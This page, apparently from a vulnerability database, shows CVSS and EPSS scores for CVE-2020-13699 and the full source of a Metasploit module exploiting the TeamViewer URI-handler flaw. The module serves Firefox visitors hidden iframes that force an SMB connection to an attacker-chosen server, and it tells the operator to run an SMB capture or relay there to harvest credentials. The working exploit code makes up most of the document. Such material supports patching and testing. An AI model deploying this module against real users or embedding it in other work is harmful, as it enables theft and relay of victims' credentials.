8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.192 Low
EPSS
Percentile
96.2%
This module exploits an unquoted parameter call within the Teamviewer URI handler to create an SMB connection to an attacker controlled IP. TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are vulnerable. Only Firefox can be exploited by this vulnerability, as all other browsers encode the space after ‘play’ and before the SMB location, preventing successful exploitation. Teamviewer 15.4.4445, and 8.0.16642 were succssfully tested against.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'TeamViewer Unquoted URI Handler SMB Redirect',
'Description' => %q{
This module exploits an unquoted parameter call within the Teamviewer
URI handler to create an SMB connection to an attacker controlled IP.
TeamViewer < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870,
12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3 are
vulnerable.
Only Firefox can be exploited by this vulnerability, as all other
browsers encode the space after 'play' and before the SMB location,
preventing successful exploitation.
Teamviewer 15.4.4445, and 8.0.16642 were succssfully tested against.
},
'Author' => [
'Jeffrey Hofmann <[email protected]>', # Vuln discovery, PoC, etc
'h00die' # msf module
],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://jeffs.sh/CVEs/CVE-2020-13699.txt' ],
[ 'CVE', '2020-13699' ],
[ 'URL', 'https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448' ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options(
[
OptString.new('FILE_NAME', [false, 'Arbitrary tv file location', '\\teamviewer\\config.tvs']),
OptString.new('SMB_SERVER', [true, 'SMB server IP address', '']),
OptEnum.new('URI_HANDLER', [
true, 'TeamViewer URI Handler', 'teamviewer10', [
'teamviewer10',
'teamviewer8', 'teamviewerapi', 'tvchat1', 'tvcontrol1', 'tvfiletransfer1', 'tvjoinv8',
'tvpresent1', 'tvsendfile1', 'tvsqcustomer1', 'tvsqsupport1', 'tvvideocall1', 'tvvpn1'
]
])
]
)
end
def html_content
# For some reason, tends to work best when double iframes. Single will pop up the 'open app' message, but tends to not connect.
%(
<html>
<head></head>
<body>
<iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
<iframe style="height:1px;width:1px;" src="#{datastore['URI_HANDLER']}: --play \\\\#{datastore['SMB_SERVER']}#{datastore['FILE_NAME']}"></iframe>
</body>
</html>
)
end
def on_request_uri(cli, req)
print_status("Request received for: #{req.uri}")
ua = req.headers['User-Agent'].to_s
unless ua.include?('Firefox')
print_error('Target is not Firefox')
return
end
print_status("Sending TeamViewer Link to #{ua}...")
send_response_html(cli, html_content)
end
def run
print_good("Please start an SMB capture/relay on #{datastore['SMB_SERVER']}")
exploit
end
end
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.192 Low
EPSS
Percentile
96.2%